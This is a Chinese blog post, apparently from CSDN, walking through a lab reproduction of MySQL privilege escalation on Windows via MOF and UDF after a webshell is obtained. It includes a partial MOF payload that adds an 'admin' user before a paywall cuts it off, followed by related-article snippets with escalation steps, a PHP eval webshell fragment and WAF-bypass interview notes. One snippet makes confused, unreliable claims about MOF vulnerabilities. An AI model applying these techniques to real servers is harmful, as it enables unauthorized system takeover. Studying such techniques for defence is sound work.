mysql提权之MOF、UDF复现

最新推荐文章于 2022-06-15 09:58:06 发布
最新推荐文章于 2022-06-15 09:58:06 发布
阅读量896 收藏 3
点赞数 1
分类专栏: 归纳笔记 文章标签: 安全 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_25768397/article/details/108221987
版权

今天复现了一下mysql提权,以往都没有尝试过,所以搭建环境尝试一下。

搭建环境:
phpstudy
win7企业版
DVWA上传点

以上步骤省略,跳到getshell后,使用哥斯拉进行提权。(假设所有条件满足,如不满足,尝试其他方法)

一、MOF提权
原理:
利用c:/windows/system32/wbem/mof/ 目录下的 nullevt.mof 文件,每分钟都会有一个特定的时间去执行一次,那么把cmd命令添加到nullevt.mof中,cmd命令就会自动执行了。

注:mysql5.7 开始默认使用 secure-file-priv 选项,不能随意选择导出路径。如有需要,需将my.ini里添加一行"secure-file-priv=".

提权要求:
1、低于win2008版本.
2、数据库为 mysql<5.7且知道登录账号密码并且允许外连.

1、先用select version();查看版本,低于5.7可尝试提权

2、将如下代码保存文件nullevt.mof,添加用户admin/admin(可改用户,代码下admin admin)。上传到可读可写文件夹。

#pragma namespace("\\.\root\subscription")

instance of __EventFilter as $EventFilter
{
EventNamespace = “Root\Cimv2”;
Name = “filtP2”;
Query = "Select * From __InstanceModificationEvent "

最低0.47元/天 解锁文章
昔年十四
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
mysql UDF 提权复现
m0_65096687的博客
05-12 390
去查看它的设置,发现设置为NULL,secure_file_priv为NULL是禁止导出文件的意思。我们得到数据库账号密码的方式有很多种,这里我们利用mysql数据库的特性,蚁剑连接后,我们进入C:\phpStudy\MySQL\data\mysql\db.MYD。mysqlUDF提权的原理就是创建一个函数来调用系统命令,这里的复现是从已经得到了webshell开始的。udf提权就是将dll文件导入目录,然后执行sql语句创建一个可以执行系统命令的函数。因为这边我使用的是蚁剑,所以直接上传文件。
mysqludf提权复现
Shanfenglan's blog
03-09 1826
文章目录参考文章 参考文章 udf提权原理详解
MYSQL数据库提权的几种方法——提权教程
W小哥
01-13 1万+
一、简介 在利用系统溢出漏洞无果的情况下,可以采用数据库进行提权。 数据库提权的前提条件: 1、服务器开启数据库服务 2、获取到最高权限用户密码 (除Access数据库外,其他数据库基本都存在数据库提权的可能) 常见密码获取方式: 1、读取网站数据库配置文件(了解其命名规则及查找技巧) 例如:sql data inc config conn database common include等 2、读取数据库存储或备份文件(了解其数据库存储格式及对应内容) 例如:@@basedir/data/数据库名/表名.m
后渗透—— 数据库之MOF提权
爱国小白帽
03-12 1353
提权原理: mof是windows系统的一个文件(在c:/windows/system32/wbem/mof/nullevt.mof)叫做"托管对象格式"其作用是每隔五秒就会去监控进程创建和死亡。其就是用又了mysql的root权限了以后,然后使用root权限去执行我们上传的mof。隔了一定时间以后这个mof就会被执行,这个mof当中有一段是vbs脚本,这个vbs大多数的是cmd的添加管理员用户...
About Mysql 的那个提权漏洞
代码析构师的专栏
06-05 564
致看了一下,原来是在导出文件的时候出的问题,具体怎么出的问题,表示看mysql的源码不是我能看的来的。。 大家都知道,要对方开启mysql的外联,并且有root密码,这种情况只能用来扫肉鸡了,还蛋疼的不行。所以我感觉用在webshell下辅助提权不错,毕竟如果导udf什么相对麻烦了一些。所以就有下面的利用: 1.找个可写目录,我这里是C:\recycler\,把如下代码写到nullev
linux mysql mof提权,mysql提权mof提权
weixin_39629631的博客
05-10 253
拿下webshell之后当前权限仅限于对网站文件的操作,想要获取对主机的操作还需进一步提权首先介绍mof提权,直接案例演示找一个可写目录上传mof文件,我这里上传到了 C:/wmpub/nullevt.mof 代码如下#pragma namespace("\\\\.\\root\\subscription")instance of __EventFilter as $EventFilter{Eve...
[WEB安全]MySQl提权 mofudf过程详解
网络安全知识分享
12-17 3145
MySQL提权〇、Mysql提权的必备条件1、Mysql密码查询2、利用ntfs特性创建文件夹3、常用的sql基础查询命令一、mof提权0、环境搭建1、原理2、条件3、开始4、删号二、UDF提权0、原理1、步骤2、实操 〇、Mysql提权的必备条件 Mysql的服务没有降权,并且需要获取Mysql root账号密码 使用net user命令查看系统当前帐号,如果出现Mysql这类用户,则系统可能进行了降权 1、Mysql密码查询 1、root密码查询 # MySQL <= 5.6 版本 selec
mof提权文件nullevt.mof
03-12
mof是windows系统的一个文件(在c:/windows/system32/wbem/mof/nullevt.mof)叫做"托管对象格式"其作用是每隔五秒就会去监控进程创建和死亡。其就是用又了mysql的root权限了以后,然后使用root权限去执行我们上传的mof。隔了一定时间以后这个mof就会被执行,这个mof当中有一段是vbs脚本,这个vbs大多数的是cmd的添加管理员用户的命令。 mof文件通过Mofcomp.exe编译执行。
Mysql UDFMOF、反链端口提权.zip
12-14
Mysql UDFMOF、反链端口提权
基于MOF的企业架构模型仓库
03-02
本文内容包括:解决方案概述上下文环境解决方案架构基于MOF的EA模型语言(EAML)模型转换结论引用注释参考资料来自RationalEdge:本文介绍了Unisys公司所完成的为美国联邦政府大规模组织构建核心企业架构(EA)的...
内网渗透之——mysql数据库提权之——MOF提权
wsnbbz的博客
03-11 962
前题 只能在windows使用,应用范围:2008以下的系统,Mysql5.7以下(--secure_file_prive:此配置写文件不限制) 介绍 mof是windows系统的一个文件(在c:/windows/system32/wbem/mof/nullevt.mof)叫做"托管对象格式"其作用是每隔五秒就会去监控进程创建和死亡 条件 mysql服务器配置允许root用户远程连接 ...
UDF提权MOF提权
Armandhe的博客
06-05 1042
让我们来康康mysql提权的两种常见姿势!!!!!!!!!!!!!!!!
MySQL udf提权
weixin_45945976的博客
12-02 913
MySQL udf提权 UDF提权这个利用还是不太常见的,因为在mysql5.1版本以后对注册的UDF的位置有了限制,而在默认的是没有\lib\plugin文件夹的,一般需要root用户修改。 什么是UDF UDF就是User Defined Function,用户自定义函数,即通过用户添加的函数来对MySQL的功能进行补偿 怎么使用UDF 我的mysql版本:5.7.26,所以我的是默认没有plugin这个目录的 查看secure_file_priv的指 secure_file_priv是用来限制load
MySQL5.0及以上和5.0以下有什么区别】
qq_55213436的博客
06-15 4618
最近也是在一直在牛牛上看各个公司的以往校园招聘的笔试和面试题目,发现这样一道有意思的问题:mysql5.0和5.0以下的版本有什么区别?我发现这个问题看是简单,但是里面包含的门道却是很多。 ......
mysql数据库反弹端口连接提权
热门推荐
xiaotu0821的博客
11-12 6万+
Mysql数据库反弹端口连接提权 在渗透或者安全评估时,有可能遇到一些比较奇葩的环境,即使通过Mysql root账号和密码获取了webshell,由于无法执行命令,在一般的情况下,也就放弃了,但其实可以换一种思路,通过mysql查询来直接提权,可以针对以下场景: (1)通过网站无法获取webshell (2)Webshell无法执行命令 (3)有phpmyadmin和root账号,无法查询或者无...
UDF提权复现
qq_51459600的博客
03-30 729
文章目录UDF提权复现环境搭建UDF提权原理提权过程 UDF提权复现 环境搭建 靶机:虚拟机Win7+phpstudy2018 ​ mysql5.5.53 ​ php5.2.17 攻击机:物理机 在已经得到webshell的情况下,利用mysqlUDF提权,在靶机WIn7上创建administrator权限的用户 UDF提权原理 条件:得到服务器webshell,知道数据库账号密码且可以远程连接 在udf.dll文件中,定义了名为sys_eval()的函数,该函数可以执行系统命令,通过该函数来完成系
udf提权总结(Mysql)
Mikasa
05-06 856
什么是udf udf = ‘user defined function‘,即‘用户自定义函数’。 是通过添加新函数,对MYSQL的功能进行扩充,性质就象使用本地MYSQL函数如abs()或concat()。 udfmysql5.1以后的版本中,存在于‘mysql/lib/plugin’目录下,文件后缀为‘.dll’,常用c语言编写。 既然支持自定义函数那么我们如果想定义一个可以执行系统命...
Mysql提权实战
永不垂头的博客
08-07 166
Mysql提权实战 Mysql提权实战 into outfile select * from table into outfile ‘/路径/文件名’ 1.需要知道物理路径 2. magic_quotes_gpc()=off(phpinfo.php) 3.权限支持 写权限 http://192.168.1.105:800/510cms2/news.php?cid=&listid=&newsid=27 and 1=2 UNION SELECT 1,2,3,’<?php eval($P
web面试指南
zhalang8324的博客
02-19 1129
介绍一下自认为有趣的挖洞经历(或CTF经历) 你平时用的比较多的漏洞是哪些?相关漏洞的原理?以及对应漏洞的修复方案? 你平时使用哪些工具?以及对应工具的特点? 如果遇到waf的情况下如何进行sql注入/上传Webshell怎么做?请写出曾经绕过WAF的经过(SQLi,XSS,上传漏洞选一) 参考以下三篇 我的WafBypass之道(SQL注入篇) 我的WafBypass之道(Upload篇) 我的WafBypass之道(Misc篇) ..
mysql mof 提权
最新发布
05-31
MySQL MOF(Management Object Format)提权指的是攻击者利用MySQL服务器中的MOF漏洞来执行任意代码,从而实现提权攻击。MOF是一种用于描述Windows系统管理对象的格式,它可以被用来创建、修改和查询Windows系统对象。MySQL服务器中的MOF提权漏洞是由于MySQL服务器使用了WMI(Windows Management Instrumentation)组件,而WMI组件中存在漏洞导致的。 攻击者可以利用MOF提权漏洞来执行任意代码,从而完全控制MySQL服务器。具体来说,攻击者可以使用以下方法来实现MOF提权: 1. 利用MOF文件中的漏洞来执行任意代码; 2. 修改MOF文件中的内容,从而实现提权; 3. 利用MOF文件中的反射注入漏洞来执行任意代码; 4. 利用MOF文件中的DLL劫持漏洞来执行任意代码。 为了避免MOF提权漏洞的发生,建议用户在使用MySQL服务器时,遵循以下几点建议: 1. 及时更新MySQL服务器和操作系统的补丁; 2. 对MySQL服务器进行安全配置,限制外部访问; 3. 建立网络安全防火墙,限制对MySQL服务器的访问; 4. 对MOF文件进行限制,只允许特定用户或组对其进行修改和查询; 5. 限制MySQL管理员的权限,只允许特定的用户或组执行MySQL操作。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值